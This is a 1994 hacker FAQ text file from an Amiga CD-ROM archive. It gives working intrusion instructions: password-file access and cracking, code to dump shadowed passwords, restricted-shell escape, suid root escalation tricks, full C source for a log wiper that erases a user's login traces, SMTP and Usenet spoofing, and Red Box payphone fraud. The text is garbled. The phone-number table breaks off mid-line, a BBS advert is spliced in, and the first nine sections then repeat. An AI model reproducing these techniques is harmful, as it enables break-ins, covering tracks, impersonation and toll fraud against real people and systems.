home *** CD-ROM | disk | FTP | other *** search
/ Amiga ISO Collection / AmigaDemoCD2.iso / ASCII / TEXTE / TheInternet / INT-HACK.TXT < prev    next >
Encoding:
Text File  |  1994-03-26  |  32.5 KB  |  1,091 lines

  1. @BEGIN_FILE_ID.DIZ
  2. Some useful info on hacking the Internet
  3. @END_FILE_ID.DIZ
  4.                             will@gnu.ai.mit.edu
  5.  
  6.                           With special thanks to:
  7.  
  8.               A-Flat, Al, Aleph1, Bluesman, C-Curve, Edison,
  9.              KCrow, Presence, Rogue Agent, sbin and TheSaint.
  10.  
  11.                             Beta Revision .004
  12.  
  13.  
  14. 01. How do I access the password file under Unix?
  15. 02. How do I crack Unix passwords?
  16. 03. How do I access the password file under VMS?
  17. 04. How do I crack VMS passwords?
  18. 05. What is NIS/yp?
  19. 06. What is password shadowing?
  20. 07. How do I break out of a restricted shell?
  21. 08. How do I gain root from a suid script or program?
  22. 09. How do I erase my presence from the system logs?
  23. 10. How do I send fakemail?
  24. 11. How do I fake posts to UseNet?
  25. 12. What is a Red Box?
  26. 13. How do I build a Red Box?
  27. 14. Which payphones will a Red Box work on?
  28. 15. What is a Blue Box?
  29. 16. Do Blue Boxes still work?
  30. 17. What is a Black Box?
  31. 18. What do all the colored boxes do?
  32. 19. What are some ftp sites of interest to hackers?
  33. 20. What are some newsgroups of interest to hackers?
  34. 21. What are some telnet sites of interest to hackers?
  35. 22. What are some World wide Web (WWW) sites of interest to hackers?
  36. 23. What are some IRC channels of interest to hackers?
  37. 24. What are some BBS's of interest to hackers?
  38. 25. How do I hack ChanOp on IRC?
  39. 26. How do I modify the IRC client to hide my real username?
  40. 27. What is the ANAC number for my area?
  41. 28. What is a ringback number?
  42. 29. What is the ringback number for my area?
  43. 30. What is a loop?
  44. 31. What is a loop in my area?
  45. 32. What is a CNA number?
  46. 33. What is the telephone company CNA number for my area?
  47. 34. What does XXX stand for?
  48. 35. What is a trojan/worm/virus?
  49. 36. Where can I find more information?
  50.  
  51.  
  52.  
  53.  
  54. 01. How do I access the password file under Unix?
  55.  
  56. In standard Unix the password file is /etc/passwd.  On a Unix system
  57. with either NIS/yp or password shadowing, much of the password data
  58. may be elsewhere.
  59.  
  60.  
  61. 02. How do I crack Unix passwords?
  62.  
  63. Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
  64. passwords are encrypted with a one way function.  The login program
  65. encrypts the text you enter at the "password:" prompt and compares
  66. that encrypted string against the encrypted form of your password.
  67.  
  68. Password cracking software uses wordlists.  Each word in the wordlist
  69. is encrypted with each of the 2600 possible salt values and the
  70. results are compared to the encrypted form of the target password.
  71.  
  72. The best cracking program for Unix passwords is currently Crack by
  73. Alec Muffett.  For PC-DOS, the best package to use is currently
  74. CrackerJack.
  75.  
  76.  
  77. 03. How do I access the password file under VMS?
  78.  
  79. Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
  80. unlike Unix, most users do not have access to read the password file.
  81.  
  82.  
  83. 04. How do I crack VMS passwords?
  84.  
  85. Write a program that uses the SYS$GETUAF functions to compare the
  86. results of encrypted words against the encrypted data in SYSUAF.DAT.
  87.  
  88. Two such programs are known to exist, CHECK_PASSWORD and
  89. GUESS_PASSWORD.
  90.  
  91.  
  92. 05. What is NIS/yp?
  93.  
  94. NIS (Network Information System) in the current name for what was once
  95. known as yp (Yellow Pages).  The purpose for NIS is to allow many
  96. machies on a network to share configuration information, including
  97. password data. NIS is not designed to promote system security.  If
  98. your system uses NIS you will have a very short /etc/passwd file with
  99. a line that looks like this:
  100.  
  101. +::0:0:::
  102.  
  103. To view the real password file use this command "cd/etc;ypcat passwd"
  104.  
  105.  
  106. 06. What is password shadowing?
  107.  
  108. Password shadowing is a security system where the encrypted password
  109. field of /etc/password is replaced with a special token and the
  110. encrypted password is stored in a seperate file which is not readable
  111. by normal system users.
  112.  
  113. To defeat password shadowing on many systems, write a program that
  114. uses successive calls to getpwent() to obtain the password file.
  115.  
  116. Example:
  117.  
  118. #include <pwd.h>
  119. main()
  120. {
  121. struct passwd *p;
  122. while(p=getpwent())
  123. printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
  124. p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
  125. }
  126.  
  127.  
  128. 07. How do I break out of a restricted shell?
  129.  
  130. On poorly implemented restricted shells you can break out of the
  131. restricted environment by running a program that features a shell
  132. function.  A good example is vi.  Run vi and use this command:
  133.  
  134. :set shell=/bin/sh
  135.  
  136. then shell using this command:
  137.  
  138. :shell
  139.  
  140.  
  141. 08. How do I gain root from a suid script or program?
  142.  
  143. 1. Change IFS.
  144.  
  145. If the shell script calls any other programs using the system()
  146. function call, you may be able to fool it by changing IFS. IFS is the
  147. Internal Field Seperator that the shell uses to delimit arguments.
  148.  
  149. If the program contains a line that looks like this:
  150.  
  151. system("/bin/date")
  152.  
  153. and you change IFS to '/' the shell will them interpret the
  154. proceeding line as:
  155.  
  156. bin date
  157.  
  158. Now, if you have a program of your own in the path called "bin" the
  159. suid program will run your program instead of /bin/date.
  160.  
  161. To change IFS, use this command:
  162.  
  163. set IFS '/'
  164.  
  165.  
  166. 2. link the script to -i
  167.  
  168. Create a symbolic link named "-i" to the program.  Running "-i"
  169. will cause the interpreter shell (/bin/sh) to start up in interactive
  170. mode.  This only works on suid shell scripts.
  171.  
  172. Example:
  173.  
  174. % ln suid.sh -i
  175. % -i
  176. #
  177.  
  178.  
  179. 3. Exploit a race condition
  180.  
  181. Replace a symbolic link to the program with another program while the
  182. kernel is loading /bin/sh.
  183.  
  184. Example:
  185.  
  186. nice -19 suidprog ; ln -s evilprog suidroot
  187.  
  188.  
  189. 4. Send bad input the the program.
  190.  
  191. Invoke the name of the program and a seperate command on the same
  192. command line.
  193.  
  194. Example:
  195.  
  196. suidprog ; id
  197.  
  198.  
  199. 09. How do I erase my presence from the system logs?
  200.  
  201. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
  202. files that can be edited by hand with vi, you must use a program
  203. specifically written for this purpose.
  204.  
  205. Example:
  206.  
  207. #include <sys/types.h>
  208. #include <stdio.h>
  209. #include <unistd.h>
  210. #include <sys/file.h>
  211. #include <fcntl.h>
  212. #include <utmp.h>
  213. #include <pwd.h>
  214. #include <lastlog.h>
  215. #define WTMP_NAME "/usr/adm/wtmp"
  216. #define UTMP_NAME "/etc/utmp"
  217. #define LASTLOG_NAME "/usr/adm/lastlog"
  218.  
  219. int f;
  220.  
  221. void kill_utmp(who)
  222. char *who;
  223. {
  224.     struct utmp utmp_ent;
  225.  
  226.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  227.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  228.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  229.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  230.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  231.                  write (f, &utmp_ent, sizeof (utmp_ent));
  232.             }
  233.      close(f);
  234.   }
  235. }
  236.  
  237. void kill_wtmp(who)
  238. char *who;
  239. {
  240.     struct utmp utmp_ent;
  241.     long pos;
  242.  
  243.     pos = 1L;
  244.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  245.  
  246.      while(pos != -1L) {
  247.         lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  248.         if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  249.           pos = -1L;
  250.         } else {
  251.           if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  252.                bzero((char *)&utmp_ent,sizeof(struct utmp ));
  253.                lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  254.                write (f, &utmp_ent, sizeof (utmp_ent));
  255.                pos = -1L;
  256.           } else pos += 1L;
  257.         }
  258.      }
  259.      close(f);
  260.   }
  261. }
  262.  
  263. void kill_lastlog(who)
  264. char *who;
  265. {
  266.     struct passwd *pwd;
  267.     struct lastlog newll;
  268.  
  269.      if ((pwd=getpwnam(who))!=NULL) {
  270.  
  271.         if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  272.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  273.             bzero((char *)&newll,sizeof( newll ));
  274.             write(f, (char *)&newll, sizeof( newll ));
  275.             close(f);
  276.         }
  277.  
  278.     } else printf("%s: ?\n",who);
  279. }
  280.  
  281. main(argc,argv)
  282. int argc;
  283. char *argv[];
  284. {
  285.     if (argc==2) {
  286.         kill_lastlog(argv[1]);
  287.         kill_wtmp(argv[1]);
  288.         kill_utmp(argv[1]);
  289.         printf("Zap2!\n");
  290.     } else
  291.     printf("Error.\n");
  292. }
  293.  
  294.  
  295. 10. How do I send fakemail?
  296.  
  297. Telnet to port 25 of the machine you want the mail to appear to
  298. originate from.  Enter your message as in this example:
  299.  
  300.  HELO bellcore.com
  301.  MAIL FROM:Voyagor@bellcore.com
  302.  RCPT TO:clinton@whitehouse.gov
  303.  DATA
  304.  
  305.         Please discontinue your silly Clipper initiative.
  306. .
  307. QUIT
  308.  
  309. On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
  310. line will not work.  Test by sending yourself fakemail first.
  311.  
  312.  
  313. 11. How do I fake posts to UseNet?
  314.  
  315. Use inews to post.  Give inews the following lines:
  316.  
  317. From:
  318. Newsgroups:
  319. Subject:
  320. Message-ID:
  321. Date:
  322. Organization:
  323.  
  324. For a moderated newsgroup, inews will also require this line:
  325.  
  326. Approved:
  327.  
  328. Then add your post and terminate with <Control-D>.
  329.  
  330. Example:
  331.  
  332. From: Dale Drew
  333. Newsgroups: alt.2600
  334. Subject: Please forgive me
  335. Message-ID: <d_drew.123@tymnet.com>
  336. Date: Fri, 13 Jun 1994 12:15:03
  337. Organization: Tymnet Insecurity
  338.  
  339. Please forgive me for being such a worthless puke all of these years.
  340.  
  341.                                                 Sincerely,
  342.  
  343.                                                         Bartman
  344. ^D
  345.  
  346.  
  347. 12. What is a Red Box?
  348.  
  349. When a coin is inserted into a payphone, the phone emits a set of
  350. tones.  A red box is a device that simulates those tones, with the
  351. purpose of fooling the payphone into believing you have inserted an
  352. actual coin.
  353.  
  354.  
  355. 13. How do I build a Red Box?
  356.  
  357. Red boxes are commonly manufactured from modified Radio Shack tone
  358. dialers, Hallmark greeting cards, or made from scratch from readily
  359. available electronic components.
  360.  
  361. To make a Red Box from a radio shack tone dialer, open the dialer and
  362. replace the crystal (the largest shiny metal component) with a crystal
  363. close to 6.5Mhz.  The most popular choice is the 6.5536Mhz crystal.
  364. When you are finished, program the P1 button with five *'s.  That will
  365. simulate a quarter tone.  Note that the tone dialer you start with
  366. must have programmable buttons.
  367.  
  368.  
  369. 14. Which payphones will a Red Box work on?
  370.  
  371. Red Boxes will work on TelCo owned payphones, but not on COCOT's
  372. (Customer Owned Coin Operated Telephones).
  373.  
  374.  
  375. 15. What is a Blue Box?
  376.  
  377. Blue boxes use a 2600hz tone to convince telephone switches that use
  378. in-band signalling that the caller is actually a telephone operator.
  379. The caller may then access special switch functions, with the usual
  380. purpose of making free long distance phone calls, using the
  381. Multi-Frequency tones provided by the Blue Box.
  382.  
  383.  
  384. 16. Do Blue Boxes still work?
  385.  
  386. Blue Boxes still work in areas using in-band signalling.  Modern phone
  387. signalling switches using ESS (Electronic Signalling Systems) use
  388. out-of-band-signalling.  Nothing you send over the voice portion of
  389. bandwidth can control the switch.
  390.  
  391.  
  392. 17. What is a Black Box?
  393.  
  394. A Black Box is a 10k ohm resistor placed across your phone line to
  395. cause the phone company equipment to be unable to detect that you have
  396. answered your telephone.  People who call you will then not be billed
  397. for the telephone call.
  398.  
  399.  
  400. 18. What do all the colored boxes do?
  401.  
  402. Acrylic      Steal Three-Way-Calling, Call Waiting and programmable Call
  403.              Forwarding on old 4-wire phone systems
  404. Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
  405. Beige        Lineman's hand set
  406. Black        Allows the calling party to not be billed for the call placed
  407. Blast        Phone microphone amplifier
  408. Blotto       Supposedly shorts every fone out in the immediate area
  409. Blue         Emulate a true operator by siezing a trunk with a 2600hz tone
  410. Brown        Create a party line from 2 phone lines
  411. Bud          Tap into your neighbors phone line
  412. Chartreuse   Use the electricity from your phone line
  413. Cheese       Connect two phones to create a divertor
  414. Chrome       Manipulate Traffic Signals by Remote Control
  415. Clear        A telephone pickup coil and a small amp use to make free
  416.              calls on Fortress Phones
  417. Color        Line activated telephone recorder
  418. Copper       Cause crosstalk interference on an extender
  419. Crimson      Hold button
  420. Dark         Re-route outgoing or incoming calls to another phone
  421. Dayglo       Connect to your neighbors phone line
  422. Divertor     Re-route outgoing or incoming calls to another phone
  423. DLOC         Create a party line from 2 phone lines
  424. Gold         Trace calls, tell if the call is being traced, and can change a tra
  425. ce
  426. Green        Emulate the Coin Collect, Coin Return, and Ringback tones
  427. Infinity     Remotely activated phone tap
  428. Jack         Touch-Tone key pad
  429. Light        In-use light
  430. Lunch        AM transmitter
  431. Magenta      Connect a remote phone line to another remote phone line
  432. Mauve        Phone tap without cutting into a line
  433. Neon         External microphone
  434. Noise        Create line noise
  435. Olive        External ringer
  436. Party        Create a party line from 2 phone lines
  437. Pearl        Tone generator
  438. Pink         Create a party line from 2 phone lines
  439. Purple       Telephone hold button
  440. Rainbow      Kill a trace by putting 120v into the phone line (uh huh..)
  441. Razz         Tap into your neighbors phone
  442. Red          Make free phone calls from pay phones by generating quarter tones
  443. Rock         Add music to your phone line
  444. Scarlet      Cause a neighbors phone line to have poor reception
  445. Silver       Create the DTMF tones for A, B, C and D
  446. Static       Keep the voltage on a phone line high
  447. Switch       Add hold, indicator lights, conferencing, etc..
  448. Tan          Line activated telephone recorder
  449. Tron         Reverse the phase of power to your house, causing your
  450.              electric meter to run slower
  451. TV Cable     "See" sound waves on your TV
  452. Urine        Create a capacitative disturbance between the ring and tip
  453.              wires in another's telephone headset
  454. Violet       Keep a payphone from hanging up
  455. White        Portable DTMF keypad
  456. Yellow       Add an extension phone
  457.  
  458.  
  459. 19. What are some ftp sites of interest to hackers?
  460.  
  461. aql.gatech.edu
  462. bellcore.com
  463. cert.org
  464. cipher.com
  465. deimos.cs.uah.edu
  466. ftp.csua.berkeley.edu   /pub/cypherpunks
  467. ftp.eff.org             /pub/cud
  468. ftp.etext.org
  469. ftp.netcom.com          /pub/bradleym
  470. ftp.netsys.com
  471. ftp.win.tue.nl
  472. garbo.uwasa.fi:pc/crypt
  473. ghost.dsi.unimi.it:/pub/crypt
  474. hack-this.pc.cc.cmu.edu
  475. halcyon.com
  476. info.cert.org
  477. ripem.msu.edu:pub/crypt
  478. rtfm.mit.edu
  479. spy.org
  480. theta.iis.u-tokyo.ac.jp /pub1/security
  481. vincent2.iastate.edu    login: anonymous.mabell /* Closed for the Summer */
  482. wimsey.bc.ca            /pub/crypto
  483.  
  484.  
  485. 20. What are some newsgroups of interest to hackers?
  486.  
  487. alt.2600
  488. alt.dcom.telecom
  489. alt.hackers
  490. alt.security.index
  491. alt.security.keydist
  492. alt.security.pgp
  493. alt.security.ripem
  494. alt.security
  495. comp.dcom.telecom       Telecommunications digest. (Moderated)
  496. comp.dcom.telecom.tech
  497. comp.org.cpsr.announce
  498. comp.org.cpsr.talk
  499. comp.org.eff
  500. comp.org.eff
  501. comp.security.announce
  502. comp.security.misc      Security issues of computers and networks.
  503. comp.security.unix
  504. comp.virus              Computer viruses & security. (Moderated)
  505. misc.security           Security in general, not just computers. (Moderated)
  506. sci.crypt               Different methods of data en/decryption.
  507.  
  508.  
  509. 21. What are some telnet sites of interest to hackers?
  510.  
  511.  
  512. 22. What are some World wide Web (WWW) sites of interest to hackers?
  513.  
  514. http://crimelab.com//bugtraq/bugtraq/html
  515. http://cs.purdue.edu/homes/spaf/coast.html
  516. http://cs.purdue.edu/homes/spaf/pcert.html
  517. http://first.org
  518. http://l0pht.com
  519. http://tamsun.tamu.edu/~clm3840/hacking.html/
  520. http://www.net23.com
  521. http://www.tnt.uni-hannover.de/stud/hamid.html
  522. http://www.spy.org /Security/Local/News
  523. http://www.phantom.com/~king
  524.  
  525.  
  526. 23. What are some IRC channels of interest to hackers?
  527.  
  528. #hack
  529. #phreak
  530. #linux
  531. #unix
  532. #warez
  533.  
  534.  
  535. 24. What are some BBS's of interest to hackers?
  536.  
  537. Home BBS        (303)343-4053
  538.  
  539.  
  540. 25. How do I hack ChanOp on IRC?
  541.  
  542. Find a server that is split from the rest of IRC and create your own
  543. channel there using the name of the channel you want ChanOp on.  When
  544. that server reconnects to the net, you will have ChanOp on the real
  545. channel.  If you have ServerOp on a server, you can cause it to split
  546. on purpose.
  547.  
  548.  
  549. 26. How do I modify the IRC client to hide my real username?
  550.  
  551. Get the IRC client from cs.bu.edu /irc/clients.  Look at the source
  552. code files irc.c and ctcp.c.  The code you are looking for is fairly
  553. easy to spot.  Change it. Change the username code in irc.c and the
  554. ctcp information code in ctcp.c.  Compile and run your client.
  555.  
  556.  
  557. 27. What is the ANAC number for my area?
  558.  
  559. How to find your ANAC number:
  560.  
  561. Look up your NPA (Area Code) and try the number listed for it. If that
  562. fails, try 1 plus the number listed for it.  If that fails, try the
  563. common numbers like 311, 958 and 200-222-2222. If that fails, try the
  564. nationwide ANAC number 404-988-9664. If you find the ANAC number for
  565. your area, please let us know.
  566.  
  567. Note that many times the ANAC number will vary for different
  568. switches in the same city.
  569.  
  570. A trick to getting the number of the phone line you are calling from
  571. is to call (800)571-8859.  It is an 800 phone sex line. The system
  572. will give you an account number.  The first 10 digits of the account
  573. number will be the telephone number from which you are calling.
  574.  
  575. NPA  ANAC number      Comments
  576. ---  ---------------  ---------------------------------------------
  577. 201  958              Hackensack/Jersey City/Newark/Paterson, NJ
  578. 203  960              CT (All)
  579. 203  970              CT (All)
  580. 204  644-xxxx         Manitoba
  581. 205  908-222-2222     Birmingham, AL
  582. 206  411              WA /* Not US West */
  583. 207  958              ME (All)
  584. 209  830              Stockton, CA
  585. 212  958              Manhattan, NY
  586. 213  114              Los Angeles, CA
  587. 213  1223             Los Angeles, CA /* some 1AESS switches */
  588. 213  211-2345         Los Angeles, CA /* English response */
  589. 213  211-2346         Los Angeles, CA /* DTMF response */
  590. 213  61056            Los Angeles, CA
  591. 214  790              Dallas, TX /* GTE */
  592. 214  970-222-2222     Dallas, TX
  593. 214  970-611-1111     Dallas, TX /* Southwestern Bell */
  594. 215  410-xxxx         Philadelphia, PA
  595. 217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL
  596. 301  958-9968         Hagerstown/Rockville, MD
  597. 305  200-222-2222     Ft. Lauderdale/Key West/Miami, FL
  598. 309  200-xxx-xxxx     Peoria/Rock Island, IL
  599. 310  114              Long Beach, CA /* on many GTE switches */
  600. 310  1223             Long Beach, CA /* some 1AESS switches */
  601. 310  211-2345         Long Beach, CA /* English response */
  602. 310  211-2346         Long Beach, CA /* DTMF response */
  603. 312  1-200-5863       Chicago, IL
  604. 312  200-xxx-xxxx     Chicago, IL
  605. 312  290              Chicago, IL
  606. 313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI
  607. 313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI
  608. 313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI
  609. 313  200200200200200  Ann Arbor/Dearborn/Detroit, MI
  610. 314  511              Columbia/Jefferson City, MO
  611. 317  310-222-2222     Indianapolis/Kokomo, IN
  612. 317  743-1218         Indianapolis/Kokomo, IN
  613. 401  222-2222         RI (All)
  614. 402  311              Lincoln, NE
  615. 403  311              Alberta, Yukon and N.W. Territory
  616. 403  908-222-2222     Alberta, Yukon and N.W. Territory
  617. 403  999              Alberta, Yukon and N.W. Territory
  618. 404  311              Atlanta, GA
  619. 404  940-xxx-xxxx     Atlanta, GA
  620. 405  897              Enid/Oklahoma City, OK
  621. 407  200-222-2222     Orlando/West Palm Beach, FL
  622. 408  300-xxx-xxxx     San Jose, CA
  623. 408  760              San Jose, CA
  624. 408  940              San Jose, CA
  625. 409  951              Beaumont/Galveston, TX
  626. 409  970-xxxx         Beaumont/Galveston, TX
  627. 410  200-555-1212     Annapolis/Baltimore, MD
  628. 410  811              Annapolis/Baltimore, MD
  629. 412  711-6633         Pittsburgh, PA
  630. 412  711-4411         Pittsburgh, PA
  631. 412  999-xxxx         Pittsburgh, PA
  632. 413  958              Pittsfield/Springfield, MA
  633. 413  200-555-5555     Pittsfield/Springfield, MA
  634. 414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  635. 415  200-555-1212     San Francisco, CA
  636. 415  211-2111         San Francisco, CA
  637. 415  2222             San Francisco, CA
  638. 415  640              San Francisco, CA
  639. 415  760-2878         San Francisco, CA
  640. 415  7600-2222        San Francisco, CA
  641. 419  311              Toledo, OH
  642. 502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY
  643. 503  611              Portland, OR  /* not all parts of town */
  644. 508  958              Fall River/New Bedford/Worchester, MA
  645. 508  200-222-1234     Fall River/New Bedford/Worchester, MA
  646. 508  200-222-2222     Fall River/New Bedford/Worchester, MA
  647. 509  560              Spokane/Walla Walla/Yakima, WA
  648. 512  200-222-2222     Austin/Corpus Christi, TX
  649. 512  830              Austin/Corpus Christi, TX
  650. 512  970-xxxx         Austin/Corpus Christi, TX
  651. 514  320-xxxx         Montreal, Quebec
  652. 515  5463             Des Moines, IA
  653. 516  958              Hempstead/Long Island, NY
  654. 516  968              Hempstead/Long Island, NY
  655. 517  200-222-2222     Bay City/Jackson/Lansing, MI
  656. 517  200200200200200  Bay City/Jackson/Lansing, MI
  657. 518  997              Albany/Schenectady/Troy, NY
  658. 518  998              Albany/Schenectady/Troy, NY
  659. 602  593-0809         Phoenix, AZ
  660. 602  593-6017         Phoenix, AZ
  661. 602  593-7451         Phoenix, AZ
  662. 603  200-222-2222     NH (All)
  663. 606  997-555-1212     Ashland/Winchester, KY
  664. 607  993              Binghamton/Elmira, NY
  665. 609  958              Atlantic City/Camden/Trenton/Vineland, NJ
  666. 612  511              Minneapolis/St.Paul, MN
  667. 615  200200200200200  Nashville, TN
  668. 615  830              Nashville, TN
  669. 616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI
  670. 617  200-222-1234     Boston, MA
  671. 617  200-222-2222     Boston, MA
  672. 617  200-444-4444     Boston, MA /* Woburn, MA */
  673. 617  220-2622         Boston, MA
  674. 617  958              Boston, MA
  675. 618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL
  676. 708  1-200-xxxx       Chicago/Elgin, IL
  677. 713  970-xxxx         Houston, TX
  678. 714  211-2121         Anaheim, CA /* GTE */
  679. 716  511              Buffalo/Ni                                    THE
  680.                          _____  _____/\________/\___
  681.                          \__  \/  \_____   \______  \_
  682.         BRAINWAVE C= HQ   /   \/  ./  _'   ./   \/ . /   BRAINWAVE C= HQ
  683.                          /    /  //   /   //   _/  :/
  684.                         /____/__ /___/___ /_______ /
  685.                                \/       \/       \/
  686.                _________________  ____________/\_____________/\
  687.                \__   /  \_____  \ \__   /  \__  ____/\__  ____/
  688.                 /  _    ./  \/   \_/   /   ./____   \_/   __)_
  689.                /   /   //    \    /:  /   //   \/    /   /   /
  690.               /___/___ /________ /_______ /________ /______ /
  691.                      \/        \/       \/        \/      \/
  692.                         [*GeRoNiMo*]  [*TuCkEr*]
  693.                Amiga 4000 -+- 68040 25mhz -+- 340 meg Online
  694.                   -+-   Coming: 1.4 Gig Online    -+-
  695.                     NØDE1 +33  FIND OUT  28.8 POWER
  696.  
  697.               ThE BesT PD »  OnLy ThE BesT
  698.             AmI/x SuPPoRT »  12.0 mEGs oF /X dOORs aND uTILs
  699.                    PoRnOs »  Over 2.5 GiGs AvAiLaBlE
  700.                    PoRnOs »  XxX-FeTiSh-TaStELeSs
  701.                            - --(· FastAdd v1.2 By Nike/Craze^Del!ght -95 ·)-- -
  702. @BEGIN_FILE_ID.DIZSome useful info on hacking the Internet
  703. @END_FILE_ID.DIZ
  704.                             will@gnu.ai.mit.edu
  705.  
  706.                           With special thanks to:
  707.  
  708.               A-Flat, Al, Aleph1, Bluesman, C-Curve, Edison,
  709.              KCrow, Presence, Rogue Agent, sbin and TheSaint.
  710.  
  711.                             Beta Revision .004
  712.  
  713.  
  714. 01. How do I access the password file under Unix?
  715. 02. How do I crack Unix passwords?
  716. 03. How do I access the password file under VMS?
  717. 04. How do I crack VMS passwords?
  718. 05. What is NIS/yp?
  719. 06. What is password shadowing?
  720. 07. How do I break out of a restricted shell?
  721. 08. How do I gain root from a suid script or program?
  722. 09. How do I erase my presence from the system logs?
  723. 10. How do I send fakemail?
  724. 11. How do I fake posts to UseNet?
  725. 12. What is a Red Box?
  726. 13. How do I build a Red Box?
  727. 14. Which payphones will a Red Box work on?
  728. 15. What is a Blue Box?
  729. 16. Do Blue Boxes still work?
  730. 17. What is a Black Box?
  731. 18. What do all the colored boxes do?
  732. 19. What are some ftp sites of interest to hackers?
  733. 20. What are some newsgroups of interest to hackers?
  734. 21. What are some telnet sites of interest to hackers?
  735. 22. What are some World wide Web (WWW) sites of interest to hackers?
  736. 23. What are some IRC channels of interest to hackers?
  737. 24. What are some BBS's of interest to hackers?
  738. 25. How do I hack ChanOp on IRC?
  739. 26. How do I modify the IRC client to hide my real username?
  740. 27. What is the ANAC number for my area?
  741. 28. What is a ringback number?
  742. 29. What is the ringback number for my area?
  743. 30. What is a loop?
  744. 31. What is a loop in my area?
  745. 32. What is a CNA number?
  746. 33. What is the telephone company CNA number for my area?
  747. 34. What does XXX stand for?
  748. 35. What is a trojan/worm/virus?
  749. 36. Where can I find more information?
  750.  
  751.  
  752.  
  753.  
  754. 01. How do I access the password file under Unix?
  755.  
  756. In standard Unix the password file is /etc/passwd.  On a Unix system
  757. with either NIS/yp or password shadowing, much of the password data
  758. may be elsewhere.
  759.  
  760.  
  761. 02. How do I crack Unix passwords?
  762.  
  763. Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
  764. passwords are encrypted with a one way function.  The login program
  765. encrypts the text you enter at the "password:" prompt and compares
  766. that encrypted string against the encrypted form of your password.
  767.  
  768. Password cracking software uses wordlists.  Each word in the wordlist
  769. is encrypted with each of the 2600 possible salt values and the
  770. results are compared to the encrypted form of the target password.
  771.  
  772. The best cracking program for Unix passwords is currently Crack by
  773. Alec Muffett.  For PC-DOS, the best package to use is currently
  774. CrackerJack.
  775.  
  776.  
  777. 03. How do I access the password file under VMS?
  778.  
  779. Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
  780. unlike Unix, most users do not have access to read the password file.
  781.  
  782.  
  783. 04. How do I crack VMS passwords?
  784.  
  785. Write a program that uses the SYS$GETUAF functions to compare the
  786. results of encrypted words against the encrypted data in SYSUAF.DAT.
  787.  
  788. Two such programs are known to exist, CHECK_PASSWORD and
  789. GUESS_PASSWORD.
  790.  
  791.  
  792. 05. What is NIS/yp?
  793.  
  794. NIS (Network Information System) in the current name for what was once
  795. known as yp (Yellow Pages).  The purpose for NIS is to allow many
  796. machies on a network to share configuration information, including
  797. password data. NIS is not designed to promote system security.  If
  798. your system uses NIS you will have a very short /etc/passwd file with
  799. a line that looks like this:
  800.  
  801. +::0:0:::
  802.  
  803. To view the real password file use this command "cd/etc;ypcat passwd"
  804.  
  805.  
  806. 06. What is password shadowing?
  807.  
  808. Password shadowing is a security system where the encrypted password
  809. field of /etc/password is replaced with a special token and the
  810. encrypted password is stored in a seperate file which is not readable
  811. by normal system users.
  812.  
  813. To defeat password shadowing on many systems, write a program that
  814. uses successive calls to getpwent() to obtain the password file.
  815.  
  816. Example:
  817.  
  818. #include <pwd.h>
  819. main()
  820. {
  821. struct passwd *p;
  822. while(p=getpwent())
  823. printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
  824. p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
  825. }
  826.  
  827.  
  828. 07. How do I break out of a restricted shell?
  829.  
  830. On poorly implemented restricted shells you can break out of the
  831. restricted environment by running a program that features a shell
  832. function.  A good example is vi.  Run vi and use this command:
  833.  
  834. :set shell=/bin/sh
  835.  
  836. then shell using this command:
  837.  
  838. :shell
  839.  
  840.  
  841. 08. How do I gain root from a suid script or program?
  842.  
  843. 1. Change IFS.
  844.  
  845. If the shell script calls any other programs using the system()
  846. function call, you may be able to fool it by changing IFS. IFS is the
  847. Internal Field Seperator that the shell uses to delimit arguments.
  848.  
  849. If the program contains a line that looks like this:
  850.  
  851. system("/bin/date")
  852.  
  853. and you change IFS to '/' the shell will them interpret the
  854. proceeding line as:
  855.  
  856. bin date
  857.  
  858. Now, if you have a program of your own in the path called "bin" the
  859. suid program will run your program instead of /bin/date.
  860.  
  861. To change IFS, use this command:
  862.  
  863. set IFS '/'
  864.  
  865.  
  866. 2. link the script to -i
  867.  
  868. Create a symbolic link named "-i" to the program.  Running "-i"
  869. will cause the interpreter shell (/bin/sh) to start up in interactive
  870. mode.  This only works on suid shell scripts.
  871.  
  872. Example:
  873.  
  874. % ln suid.sh -i
  875. % -i
  876. #
  877.  
  878.  
  879. 3. Exploit a race condition
  880.  
  881. Replace a symbolic link to the program with another program while the
  882. kernel is loading /bin/sh.
  883.  
  884. Example:
  885.  
  886. nice -19 suidprog ; ln -s evilprog suidroot
  887.  
  888.  
  889. 4. Send bad input the the program.
  890.  
  891. Invoke the name of the program and a seperate command on the same
  892. command line.
  893.  
  894. Example:
  895.  
  896. suidprog ; id
  897.  
  898.  
  899. 09. How do I erase my presence from the system logs?
  900.  
  901. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
  902. files that can be edited by hand with vi, you must use a program
  903. specifically written for this purpose.
  904.  
